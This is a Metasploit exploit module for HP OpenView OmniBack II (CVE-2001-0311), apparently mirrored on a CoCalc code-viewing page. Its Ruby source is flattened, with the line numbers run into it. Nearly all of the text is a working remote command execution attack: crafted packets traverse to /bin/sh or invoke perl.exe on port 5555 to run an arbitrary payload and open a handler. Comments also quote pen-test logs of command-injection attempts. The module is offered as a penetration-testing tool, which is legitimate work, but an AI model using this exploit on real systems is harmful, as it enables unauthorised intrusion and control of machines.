CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/misc/openview_omniback_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'HP OpenView OmniBack II Command Execution',13'Description' => %q{14This module uses a vulnerability in the OpenView Omniback II15service to execute arbitrary commands. This vulnerability was16discovered by DiGiT and his code was used as the basis for this17module.1819For Microsoft Windows targets, due to module limitations, use the20"unix/cmd/generic" payload and set CMD to your command. You can only21pass a small amount of characters (4) to the command line on Windows.22},23'Author' => [ 'hdm', 'aushack' ],24'License' => MSF_LICENSE,25'References' =>26[27['CVE', '2001-0311'],28['OSVDB', '6018'],29['BID', '11032'],30['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],31],32'Platform' => ['unix'], # win33'Arch' => ARCH_CMD,34'Privileged' => false,35'Payload' =>36{37'Space' => 1024,38'DisableNops' => true,39'Compat' =>40{41'PayloadType' => 'cmd',42'RequiredCmd' => 'generic perl telnet',43}44},45'Targets' =>46[47[ 'Unix', { }],48[ 'Windows', { }],49],50'DisclosureDate' => '2001-02-28',51'DefaultTarget' => 0))5253register_options(54[55Opt::RPORT(5555)56])57end5859def check6061if (target.name =~ /Unix/)62connect6364poof =65"\x00\x00\x00.2"+66"\x00 a"+67"\x00 0"+68"\x00 0"+69"\x00 0"+70"\x00 A"+71"\x00 28"+72"\x00/../../../bin/sh"+73"\x00\x00"+74"digit "+75"AAAA\n\x00"7677sock.put(poof)78sock.put("echo /etc/*;\n")79res = sock.get_once(-1, 5)80disconnect8182if !(res and res.length > 0)83vprint_status("The remote service did not reply to our request")84return Exploit::CheckCode::Safe85end8687if (res =~ /passwd|group|resolv/)88vprint_status("The remote service is exploitable")89return Exploit::CheckCode::Vulnerable90end9192return Exploit::CheckCode::Safe93end9495if (target.name =~ /Windows/)96connect9798poof =99"\x00\x00\x00.2"+100"\x00 a"+101"\x00 0"+102"\x00 0"+103"\x00 0"+104"\x00 A"+105"\x00 28"+106"\x00\\perl.exe"+107"\x00\x20-e\x20system(dir)\x00\x00"+108"digit "+109"AAAA\n\x00"110111sock.put(poof)112res = sock.get_once(-1, 5)113disconnect114115print_status(res.to_s)116117if !(res and res.length > 0)118print_status("The remote service did not reply to our request")119return Exploit::CheckCode::Safe120end121122if (res =~ /V.o.l.u.m.e/) #Unicode123print_status("The remote service is exploitable")124return Exploit::CheckCode::Vulnerable125end126127return Exploit::CheckCode::Safe128end129end130131def exploit132if (target.name =~ /Unix/)133connect134135poof =136"\x00\x00\x00.2"+137"\x00 a"+138"\x00 0"+139"\x00 0"+140"\x00 0"+141"\x00 A"+142"\x00 28"+143"\x00/../../../bin/sh"+144"\x00\x00"+145"digit "+146"AAAA\n\x00"147148sock.put(poof)149sock.put(payload.encoded + ";\n")150res = sock.get_once(-1, 5)151152if !(res and res.length > 0)153print_status("The remote service did not reply to our request")154disconnect155return156end157158print(res)159160handler161disconnect162end163164if (target.name =~ /Windows/)165166# aushack167#168# Tested during pen test against Windows 2003 server.169# Windows Service details:170# - Data Protector Inet171# -> [HP OpenView Storage Data Protector] - Backup client service172# -> "C:\Program Files\OmniBack\bin\omniinet.exe"173# -> OmniInet service for Windows NT174# -> File version: 6.0.0.0175#176# This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.177#178# Notes:179# I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe180# Perhaps a difference in Windows/Unix code? Logs:181#182#11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384183#A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client184#185#11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384186#[RxNtIntegUtil] parameter refused: ..\foo.exe187#188#11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384189#A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client190#191#11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384192#[RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:193#194#11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384195#A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client196#197#11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384198#[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >199200connect201202poof =203"\x00\x00\x00.2"+204"\x00 a"+205"\x00 0"+206"\x00 0"+207"\x00 0"+208"\x00 A"+209"\x00 28"+210"\x00\\perl.exe"+211"\x00\x20-esystem(#{payload.encoded})\x00\x00"+212"digit "+213"AAAA\n\x00"214215sock.put(poof)216#sock.put(payload.encoded + "\n")217res = sock.get_once(-1, 5)218219if !(res and res.length > 0)220print_status("The remote service did not reply to our request")221disconnect222return223end224225print(res)226227handler228disconnect229end230end231end232233234